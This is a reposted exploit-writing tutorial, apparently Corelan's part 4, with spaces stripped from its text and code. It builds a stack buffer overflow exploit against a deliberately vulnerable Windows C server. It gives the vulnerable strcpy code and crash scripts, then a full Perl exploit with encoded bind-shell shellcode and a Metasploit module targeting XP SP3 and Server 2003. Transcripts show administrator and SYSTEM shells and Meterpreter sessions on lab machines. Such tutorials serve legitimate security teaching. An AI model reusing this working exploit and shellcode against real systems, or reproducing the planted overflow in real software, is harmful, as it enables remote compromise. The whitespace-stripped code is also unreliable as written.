您的位置:首页 > 编程语言 > ASP

Exploit writing tutorial part 4 : From Exploit to Metasploit – The basics

2011-11-01 12:19 507 查看
Inthefirstpartsoftheexploitwritingtutorial,Ihavediscussedsomecommonvulnerabilitiesthatcanleadto2typesofexploits:stackbasedbufferoverflows(withdirectEIPoverwrite),andstackbasedbufferoverflowsthattakeadvantageofSEH
chains.Inmyexamples,Ihaveusedperltodemonstratehowtobuildaworkingexploit.

Obviously,writingexploitsisnotlimitedtoperlonly.Iguesseveryprogramminglanguagecouldbeusedtowriteexploits…soyoucanjustpicktheonethatyouaremostfamiliarwith.(python,c,c++,C#,etc)

Despitethefactthatthesecustomwrittenexploitswillworkjustfine,itmaybenicetobeabletoincludeyourownexploitsinthemetasploitframeworkinordertotakeadvantageofsomeoftheuniquemetasploitfeatures.

Sotoday,I’mgoingtoexplainhowexploitscanbewrittenasametasploitmodule.

Metasploitmodulesarewrittinginruby.Evenifyoudon’tknowalotaboutruby,youshouldstillbeabletowriteametasploitexploitmodulebasedonthistutorialandtheexistingexploitsavailableinmetasploit.

Metasploitexploitmodulestructure

Atypicalmetasploitexploitmoduleconsistsofthefollowingcomponents:

headerandsomedependencies

Somecommentsabouttheexploitmodule
require‘msf/core’

classdefinition
includes
“def”definitions:

initialize
check(optional)
exploit

Youcanputcommentsinyourmetasploitmodulebyusingthe#character.That’sallweneedtoknowfornow,let’slookatthestepstobuildametasploitexploitmodule.

Casestudy:buildinganexploitforasimplevulnerableserver

We’llusethefollowingvulnerableservercode(C)todemonstratethebuildingprocess:

#include<iostream.h>
#include<winsock.h>
#include<windows.h>

//loadwindowssocket
#pragmacomment(lib,"wsock32.lib")

//DefineReturnMessages
#defineSS_ERROR1
#defineSS_OK0

voidpr(char*str)
{
charbuf[500]="";
strcpy(buf,str);
}
voidsError(char*str)
{
MessageBox(NULL,str,"socketError",MB_OK);
WSACleanup();
}

intmain(intargc,char**argv)
{

WORDsockVersion;
WSADATAwsaData;

intrVal;
charMessage[5000]="";
charbuf[2000]="";

u_shortLocalPort;
LocalPort=200;

//wsock32initializedforusage
sockVersion=MAKEWORD(1,1);
WSAStartup(sockVersion,&wsaData);

//createserversocket
SOCKETserverSocket=socket(AF_INET,SOCK_STREAM,0);

if(serverSocket==INVALID_SOCKET)
{
sError("Failedsocket()");
returnSS_ERROR;
}

SOCKADDR_INsin;
sin.sin_family=PF_INET;
sin.sin_port=htons(LocalPort);
sin.sin_addr.s_addr=INADDR_ANY;

//bindthesocket
rVal=bind(serverSocket,(LPSOCKADDR)&sin,sizeof(sin));
if(rVal==SOCKET_ERROR)
{
sError("Failedbind()");
WSACleanup();
returnSS_ERROR;
}

//getsockettolisten
rVal=listen(serverSocket,10);
if(rVal==SOCKET_ERROR)
{
sError("Failedlisten()");
WSACleanup();
returnSS_ERROR;
}

//waitforaclienttoconnect
SOCKETclientSocket;
clientSocket=accept(serverSocket,NULL,NULL);
if(clientSocket==INVALID_SOCKET)
{
sError("Failedaccept()");
WSACleanup();
returnSS_ERROR;
}

intbytesRecv=SOCKET_ERROR;
while(bytesRecv==SOCKET_ERROR)
{
//receivethedatathatisbeingsentbytheclientmaxlimitto5000bytes.
bytesRecv=recv(clientSocket,Message,5000,0);

if(bytesRecv==0||bytesRecv==WSAECONNRESET)
{
printf("\nConnectionClosed.\n");
break;
}
}

//Passthedatareceivedtothefunctionpr
pr(Message);

//closeclientsocket
closesocket(clientSocket);
//closeserversocket
closesocket(serverSocket);

WSACleanup();

returnSS_OK;
}


CompilethecodeandrunitonaWindows2003serverR2withSP2.(Ihaveusedlcc-win32tocompilethecode)

Whenyousend1000bytestotheserver,theserverwillcrash.

Thefollowingperlscriptdemonstratesthecrash:

usestrict;
useSocket;
my$junk="\x41"x1000;

#initializehostandport
my$host=shift||'localhost';
my$port=shift||200;

my$proto=getprotobyname('tcp');

#gettheportaddress
my$iaddr=inet_aton($host);
my$paddr=sockaddr_in($port,$iaddr);

print"[+]Settingupsocket\n";
#createthesocket,connecttotheport
socket(SOCKET,PF_INET,SOCK_STREAM,$proto)ordie"socket:$!";
print"[+]Connectingto$hostonport$port\n";
connect(SOCKET,$paddr)ordie"connect:$!";

print"[+]Sendingpayload\n";
printSOCKET$junk."\n";

print"[+]Payloadsent\n";

closeSOCKETordie"close:$!";

Thevulnerableserverdies,andEIPgetsoverwrittenwithA’s

0:001>g
(e00.de0):Accessviolation-codec0000005(firstchance)
Firstchanceexceptionsarereportedbeforeanyexceptionhandling.
Thisexceptionmaybeexpectedandhandled.
eax=0012e05cebx=7ffd6000ecx=00000000edx=0012e446esi=0040bdecedi=0012ebe0
eip=41414141esp=0012e258ebp=41414141iopl=0nvupeiplnzacponc
cs=001bss=0023ds=0023es=0023fs=003bgs=0000efl=00010212
41414141?????

Usingametasploitpattern,wedeterminethattheoffsettoEIPoverwriteisat504bytes.Sowe’llbuildanewcrashscripttoverifytheoffsetandseethecontentsoftheregisterswhentheoverflowoccurs:

usestrict;
useSocket;

my$totalbuffer=1000;
my$junk="\x41"x504;
my$eipoverwrite="\x42"x4;
my$junk2="\x43"x($totalbuffer-length($junk.$eipoverwrite));

#initializehostandport
my$host=shift||'localhost';
my$port=shift||200;

my$proto=getprotobyname('tcp');

#gettheportaddress
my$iaddr=inet_aton($host);
my$paddr=sockaddr_in($port,$iaddr);

print"[+]Settingupsocket\n";
#createthesocket,connecttotheport
socket(SOCKET,PF_INET,SOCK_STREAM,$proto)ordie"socket:$!";
print"[+]Connectingto$hostonport$port\n";
connect(SOCKET,$paddr)ordie"connect:$!";

print"[+]Sendingpayload\n";
printSOCKET$junk.$eipoverwrite.$junk2."\n";

print"[+]Payloadsent\n";

closeSOCKETordie"close:$!";

Aftersending504A’s,4B’sandabunchofC’s,wecanseethefollowingregisterandstackcontents:

0:001>g
(ed0.eb0):Accessviolation-codec0000005(firstchance)
Firstchanceexceptionsarereportedbeforeanyexceptionhandling.
Thisexceptionmaybeexpectedandhandled.
eax=0012e05cebx=7ffde000ecx=00000000edx=0012e446esi=0040bdecedi=0012ebe0
eip=42424242esp=0012e258ebp=41414141iopl=0nvupeiplnzacponc
cs=001bss=0023ds=0023es=0023fs=003bgs=0000efl=00010212
42424242?????
0:000>desp
0012e2584343434343434343-4343434343434343CCCCCCCCCCCCCCCC
0012e2684343434343434343-4343434343434343CCCCCCCCCCCCCCCC
0012e2784343434343434343-4343434343434343CCCCCCCCCCCCCCCC
0012e2884343434343434343-4343434343434343CCCCCCCCCCCCCCCC
0012e2984343434343434343-4343434343434343CCCCCCCCCCCCCCCC
0012e2a84343434343434343-4343434343434343CCCCCCCCCCCCCCCC
0012e2b84343434343434343-4343434343434343CCCCCCCCCCCCCCCC
0012e2c84343434343434343-4343434343434343CCCCCCCCCCCCCCCC

Increasethejunksizetoseehowmuchspaceyouhaveavailableforyourshellcode.Thisisimportantbecauseyouwillneedtospecifythisparameterinthemetasploitmodule.

Changethe$totalbuffervalueto2000,overflowstillworksasexpected,andthecontentsofespindicatethatwehavebeenabletofillmemorywithC’suptoesp+5d3(1491bytes).Thatwillbeourshellcodespace(moreorless)

AllweneedistooverwriteEIPwithjmpesp(orcallesp,orsomethingsimilar),andputourshellcodeinsteadoftheC’sandweshouldbefine.

Usingfindjmp,wehavefoundaworkingaddressforourWindows2003R2SP2server:

findjmp.exews2_32.dllesp
Reg:esp
Scanningws2_32.dllforcodeusablewiththeespregister
0x71C02B67pushesp-ret
FinishedScanningws2_32.dllforcodeusablewiththeespregister
Found1usableaddresses

Afterdoingsometestswithshellcode,wecanusethefollowingconclusionstobuildthefinalexploits

exclude0xfffromtheshellcode
putsomenop’sbeforetheshellcode

Ourfinalexploit(inperl,withashellboundtotcp5555)lookslikethis:

#
print"--------------------------------------\n";
print"WritingBufferOverflows\n";
print"PeterVanEeckhoutte\n";
print"http://www.corelan.be:8800\n";print"--------------------------------------\n";
print"Exploitforvulnserver.c\n";
print"--------------------------------------\n";
usestrict;
useSocket;
my$junk="\x90"x504;

#jmpesp(fromws2_32.dll)
my$eipoverwrite=pack('V',0x71C02B67);

#addsomeNOP's
my$shellcode="\x90"x50;

#windows/shell_bind_tcp-702bytes
#http://www.metasploit.com#Encoder:x86/alpha_upper
#EXITFUNC=seh,LPORT=5555,RHOST=
$shellcode=$shellcode."\x89\xe0\xd9\xd0\xd9\x70\xf4\x59\x49\x49\x49\x49\x49\x43".
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58".
"\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42".
"\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30".
"\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x42\x4a".
"\x4a\x4b\x50\x4d\x4d\x38\x4c\x39\x4b\x4f\x4b\x4f\x4b\x4f".
"\x45\x30\x4c\x4b\x42\x4c\x51\x34\x51\x34\x4c\x4b\x47\x35".
"\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x44\x38\x45\x51\x4a\x4f".
"\x4c\x4b\x50\x4f\x44\x58\x4c\x4b\x51\x4f\x47\x50\x43\x31".
"\x4a\x4b\x47\x39\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e".
"\x50\x31\x49\x50\x4a\x39\x4e\x4c\x4c\x44\x49\x50\x42\x54".
"\x45\x57\x49\x51\x48\x4a\x44\x4d\x45\x51\x48\x42\x4a\x4b".
"\x4c\x34\x47\x4b\x46\x34\x46\x44\x51\x38\x42\x55\x4a\x45".
"\x4c\x4b\x51\x4f\x51\x34\x43\x31\x4a\x4b\x43\x56\x4c\x4b".
"\x44\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b".
"\x44\x43\x46\x4c\x4c\x4b\x4b\x39\x42\x4c\x51\x34\x45\x4c".
"\x45\x31\x49\x53\x46\x51\x49\x4b\x43\x54\x4c\x4b\x51\x53".
"\x50\x30\x4c\x4b\x47\x30\x44\x4c\x4c\x4b\x42\x50\x45\x4c".
"\x4e\x4d\x4c\x4b\x51\x50\x44\x48\x51\x4e\x43\x58\x4c\x4e".
"\x50\x4e\x44\x4e\x4a\x4c\x46\x30\x4b\x4f\x4e\x36\x45\x36".
"\x51\x43\x42\x46\x43\x58\x46\x53\x47\x42\x45\x38\x43\x47".
"\x44\x33\x46\x52\x51\x4f\x46\x34\x4b\x4f\x48\x50\x42\x48".
"\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x46\x30\x4b\x4f\x48\x56".
"\x51\x4f\x4c\x49\x4d\x35\x43\x56\x4b\x31\x4a\x4d\x45\x58".
"\x44\x42\x46\x35\x43\x5a\x43\x32\x4b\x4f\x4e\x30\x45\x38".
"\x48\x59\x45\x59\x4a\x55\x4e\x4d\x51\x47\x4b\x4f\x48\x56".
"\x51\x43\x50\x53\x50\x53\x46\x33\x46\x33\x51\x53\x50\x53".
"\x47\x33\x46\x33\x4b\x4f\x4e\x30\x42\x46\x42\x48\x42\x35".
"\x4e\x53\x45\x36\x50\x53\x4b\x39\x4b\x51\x4c\x55\x43\x58".
"\x4e\x44\x45\x4a\x44\x30\x49\x57\x46\x37\x4b\x4f\x4e\x36".
"\x42\x4a\x44\x50\x50\x51\x50\x55\x4b\x4f\x48\x50\x45\x38".
"\x49\x34\x4e\x4d\x46\x4e\x4a\x49\x50\x57\x4b\x4f\x49\x46".
"\x46\x33\x50\x55\x4b\x4f\x4e\x30\x42\x48\x4d\x35\x51\x59".
"\x4c\x46\x51\x59\x51\x47\x4b\x4f\x49\x46\x46\x30\x50\x54".
"\x46\x34\x50\x55\x4b\x4f\x48\x50\x4a\x33\x43\x58\x4b\x57".
"\x43\x49\x48\x46\x44\x39\x51\x47\x4b\x4f\x4e\x36\x46\x35".
"\x4b\x4f\x48\x50\x43\x56\x43\x5a\x45\x34\x42\x46\x45\x38".
"\x43\x53\x42\x4d\x4b\x39\x4a\x45\x42\x4a\x50\x50\x50\x59".
"\x47\x59\x48\x4c\x4b\x39\x4d\x37\x42\x4a\x47\x34\x4c\x49".
"\x4b\x52\x46\x51\x49\x50\x4b\x43\x4e\x4a\x4b\x4e\x47\x32".
"\x46\x4d\x4b\x4e\x50\x42\x46\x4c\x4d\x43\x4c\x4d\x42\x5a".
"\x46\x58\x4e\x4b\x4e\x4b\x4e\x4b\x43\x58\x43\x42\x4b\x4e".
"\x48\x33\x42\x36\x4b\x4f\x43\x45\x51\x54\x4b\x4f\x48\x56".
"\x51\x4b\x46\x37\x50\x52\x50\x51\x50\x51\x50\x51\x43\x5a".
"\x45\x51\x46\x31\x50\x51\x51\x45\x50\x51\x4b\x4f\x4e\x30".
"\x43\x58\x4e\x4d\x49\x49\x44\x45\x48\x4e\x46\x33\x4b\x4f".
"\x48\x56\x43\x5a\x4b\x4f\x4b\x4f\x50\x37\x4b\x4f\x4e\x30".
"\x4c\x4b\x51\x47\x4b\x4c\x4b\x33\x49\x54\x42\x44\x4b\x4f".
"\x48\x56\x51\x42\x4b\x4f\x48\x50\x43\x58\x4a\x50\x4c\x4a".
"\x43\x34\x51\x4f\x50\x53\x4b\x4f\x4e\x36\x4b\x4f\x48\x50".
"\x41\x41";

#initializehostandport
my$host=shift||'localhost';
my$port=shift||200;

my$proto=getprotobyname('tcp');

#gettheportaddress
my$iaddr=inet_aton($host);
my$paddr=sockaddr_in($port,$iaddr);

print"[+]Settingupsocket\n";
#createthesocket,connecttotheport
socket(SOCKET,PF_INET,SOCK_STREAM,$proto)ordie"socket:$!";
print"[+]Connectingto$hostonport$port\n";
connect(SOCKET,$paddr)ordie"connect:$!";

print"[+]Sendingpayload\n";
printSOCKET$junk.$eipoverwrite.$shellcode."\n";

print"[+]Payloadsent\n";
print"[+]Attemptingtotelnetto$hostonport5555...\n";
system("telnet$host5555");

closeSOCKETordie"close:$!";

Exploitoutput:

root@backtrack4:/tmp#perlsploit.pl192.168.24.3200
--------------------------------------
WritingBufferOverflows
PeterVanEeckhouttehttp://www.corelan.be:8800--------------------------------------
Exploitforvulnserver.c
--------------------------------------
[+]Settingupsocket
[+]Connectingto192.168.24.3onport200
[+]Sendingpayload
[+]Payloadsent
[+]Attemptingtotelnetto192.168.24.3onport5555...
Trying192.168.24.3...
Connectedto192.168.24.3.
Escapecharacteris'^]'.
MicrosoftWindows[Version5.2.3790]
(C)Copyright1985-2003MicrosoftCorp.

C:\vulnserver\lcc>whoami
whoami
win2003-01\administrator

Themostimportantparametersthatcanbetakenfromthisexploitare

offsettoret(eipoverwrite)is504
windows2003R2SP2(English)jumpaddressis0x71C02B67
shellcodeshouldnotcontain0×00or0xff
shellcodecanbemoreorless1400bytes

Futhermore,afterrunningthesametestsagainstaWindowsXPSP3(English),wedeterminethattheoffsetisthesame,butthejmpaddressmustbechanged(toforexample0x7C874413).We’llbuildametasploitmodulethatwillallowyoutoselectoneof
these2targets,andwillusethecorrectjmpaddress.

Convertingtheexploittometasploit
First,youneedtodeterminewhattypeyourexploitwillbe,becausethatwilldeterminetheplacewithinthemetasploitfolderstructurewheretheexploitwillbesaved.Ifyourexploitistargettingawindowsbasedftpserver,itwouldneedtobeplaced
underthewindowsftpserverexploits.

Metasploitmodulesaresavedintheframework3xxfolderstructure,under/modules/exploits.Inthatfolder,theexploitsarebrokendownintooperatingsystemsfirst,andthenservices.

Ourserverrunsonwindows,sowe’llputitunderwindows.Thewindowsfodlercontainsanumberoffoldersalready(fromantivirustowins),includea“misc”folder.We’llputourexploitunder“misc”(orwecouldputitundertelnet)becauseitdoesnot
reallybelongtoanyoftheothertypes.

We’llcreateourmetasploitmoduleunder%metasploit%/modules/windows/misc:

root@backtrack4:/#cd/pentest/exploits/framework3/modules/exploits/windows/misc
root@backtrack4:/pentest/exploits/framework3/modules/exploits/windows/misc#vicustom_vulnserver.rb


#
#
#Custommetasploitexploitforvulnserver.c
#WrittenbyPeterVanEeckhoutte
#
#
require'msf/core'

classMetasploit3<Msf::Exploit::Remote

includeMsf::Exploit::Remote::Tcp

definitialize(info={})
super(update_info(info,
'Name'=>'Customvulnerableserverstackoverflow',
'Description'=>%q{
Thismoduleexploitsastackoverflowina
customvulnerableserver.
},
'Author'=>['PeterVanEeckhoutte'],
'Version'=>'$Revision:9999$',
'DefaultOptions'=>
{
'EXITFUNC'=>'process',
},
'Payload'=>
{
'Space'=>1400,
'BadChars'=>"\x00\xff",
},
'Platform'=>'win',

'Targets'=>
[
['WindowsXPSP3En',
{'Ret'=>0x7c874413,'Offset'=>504}],
['Windows2003ServerR2SP2',
{'Ret'=>0x71c02b67,'Offset'=>504}],
],
'DefaultTarget'=>0,

'Privileged'=>false
))

register_options(
[
Opt::RPORT(200)
],self.class)
end

defexploit
connect

junk=make_nops(target['Offset'])
sploit=junk+[target.ret].pack('V')+make_nops(50)+payload.encoded
sock.put(sploit)

handler
disconnect

end

end

Weseethefollowingcomponents:

first,put“requiremsf/core”,whichwillbevalidforallmetasploitexploits

definetheclass.Inourcase,itisaremoteexploit.
Next,setexploitinformationandexploitdefinitions:

include:inourcase,itisaplaintcpconnection,soweuseMsf::Exploit::Remote::Tcp

Metasploithashandlersforhttp,ftp,etc…(whichwillhelpyoubuildingexploitsfasterbecauseyoudon’thavetowritetheentireconversationyourself)

Information:

Payload:definethelengthandbadchars(0×00and0xffinourcase)
Definethetargets,anddefinetarget-specificsettingssuchasreturnaddress,offset,etc

Exploit

connect(whichwillsetuptheconnectiontotheremoteport)
buildthebuffer

junk(nops,withsizeofoffset)
addthereturnaddress,morenops,andthentheencodedpayload

writethebuffertotheconnection
handletheexploit
disconnect

That’sit

Nowopenmsfconsole.Ifthereisanerrorinyourscript,youwillseeinformationabouttheerrorwhilemsfconsoleloads.Ifmsfconsolewasalreadyloaded,you’llhavetocloseitagainbeforeyoucanusethisnewmodule(orbeforeyoucanuseupdated
moduleifyouhavemadeachange)

Testtheexploit
Test1:WindowsXPSP3
root@backtrack4:/pentest/exploits/framework3#./msfconsole

||_)|
__`__\_\__|_`|__|__\|_\|__|
|||__/|(|\__\|||(|||
_|_|_|\___|\__|\__,_|____/.__/_|\___/_|\__|
_|

=[msfv3.3-dev
+----=[395exploits-239payloads
+----=[20encoders-7nops
=[187aux

msf>usewindows/misc/custom_vulnserver
msfexploit(custom_vulnserver)>showoptions

Moduleoptions:

NameCurrentSettingRequiredDescription
--------------------------------------
RHOSTyesThetargetaddress
RPORT200yesThetargetport

Exploittarget:

IdName
------
0WindowsXPSP3En

msfexploit(custom_vulnserver)>setrhost192.168.24.10
rhost=>192.168.24.10
msfexploit(custom_vulnserver)>showtargets

Exploittargets:

IdName
------
0WindowsXPSP3En
1Windows2003ServerR2SP2

msfexploit(custom_vulnserver)>settarget0
target=>0
msfexploit(custom_vulnserver)>setpayloadwindows/meterpreter/bind_tcp
payload=>windows/meterpreter/bind_tcp
msfexploit(custom_vulnserver)>showoptions

Moduleoptions:

NameCurrentSettingRequiredDescription
--------------------------------------
RHOST192.168.24.10yesThetargetaddress
RPORT200yesThetargetport

Payloadoptions(windows/meterpreter/bind_tcp):

NameCurrentSettingRequiredDescription
--------------------------------------
EXITFUNCprocessyesExittechnique:seh,thread,process
LPORT4444yesThelocalport
RHOST192.168.24.10noThetargetaddress

Exploittarget:

IdName
------
0WindowsXPSP3En

msfexploit(custom_vulnserver)>exploit

[*]Startedbindhandler
[*]Transmittingintermediatestagerforover-sizedstage...(216bytes)
[*]Sendingstage(718336bytes)
[*]Meterpretersession1opened(192.168.24.1:42150->192.168.24.10:4444)

meterpreter>sysinfo
Computer:SPLOITBUILDER1
OS:WindowsXP(Build2600,ServicePack3).


Test2:Windows2003ServerR2SP2
(continuedfromexploittoXP):

meterpreter>
meterpreter>quit

[*]Meterpretersession1closed.
msfexploit(custom_vulnserver)>setrhost192.168.24.3
rhost=>192.168.24.3
msfexploit(custom_vulnserver)>settarget1
target=>1
msfexploit(custom_vulnserver)>showoptions

Moduleoptions:

NameCurrentSettingRequiredDescription
--------------------------------------
RHOST192.168.24.3yesThetargetaddress
RPORT200yesThetargetport

Payloadoptions(windows/meterpreter/bind_tcp):

NameCurrentSettingRequiredDescription
--------------------------------------
EXITFUNCprocessyesExittechnique:seh,thread,process
LPORT4444yesThelocalport
RHOST192.168.24.3noThetargetaddress

Exploittarget:

IdName
------
1Windows2003ServerR2SP2

msfexploit(custom_vulnserver)>exploit

[*]Startedbindhandler
[*]Transmittingintermediatestagerforover-sizedstage...(216bytes)
[*]Sendingstage(718336bytes)
[*]Meterpretersession2opened(192.168.24.1:56109->192.168.24.3:4444)

meterpreter>sysinfo
Computer:WIN2003-01
OS:Windows.NETServer(Build3790,ServicePack2).

meterpreter>getuid
Serverusername:WIN2003-01\Administrator
meterpreter>ps

Processlist
============

PIDNamePath
-----------
300smss.exe\SystemRoot\System32\smss.exe
372winlogon.exe\??\C:\WINDOWS\system32\winlogon.exe
396Explorer.EXEC:\WINDOWS\Explorer.EXE
420services.exeC:\WINDOWS\system32\services.exe
424ctfmon.exeC:\WINDOWS\system32\ctfmon.exe
432lsass.exeC:\WINDOWS\system32\lsass.exe
652svchost.exeC:\WINDOWS\system32\svchost.exe
832svchost.exeC:\WINDOWS\System32\svchost.exe
996spoolsv.exeC:\WINDOWS\system32\spoolsv.exe
1132svchost.exeC:\WINDOWS\System32\svchost.exe
1392dllhost.exeC:\WINDOWS\system32\dllhost.exe
1580svchost.exeC:\WINDOWS\System32\svchost.exe
1600svchost.exeC:\WINDOWS\System32\svchost.exe
2352cmd.exeC:\WINDOWS\system32\cmd.exe
2888vulnserver.exeC:\vulnserver\lcc\vulnserver.exe

meterpreter>migrate996
[*]Migratingto996...
[*]Migrationcompletedsuccessfully.
meterpreter>getuid
Serverusername:NTAUTHORITY\SYSTEM

pwned!

MoreinfoabouttheMetasploitAPI
YoucanfindmoreinformationabouttheMetasploitAPI(andavailableclasses)at
http://www.metasploit.com/documents/api/msfcore/index.html
Nowgooutandbuildyourownexploits,putsomel33ttalkintheexploitanddon’tforgettosendyourgreetingstocorelanc0d3r:-)

©2009–2010,CorelanTeam(corelanc0d3r).Allrightsreserved.
                                            

                                        

                        
                        内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息 
                    

                    

                    

                        

                         标签: 
                                                

                        

                    


                

            


            

                
相关文章推荐

                

                
            

        

        

            

            
            

                

                    
新的分享

                    

                        
                    

                

            


            

                

                    
章节导航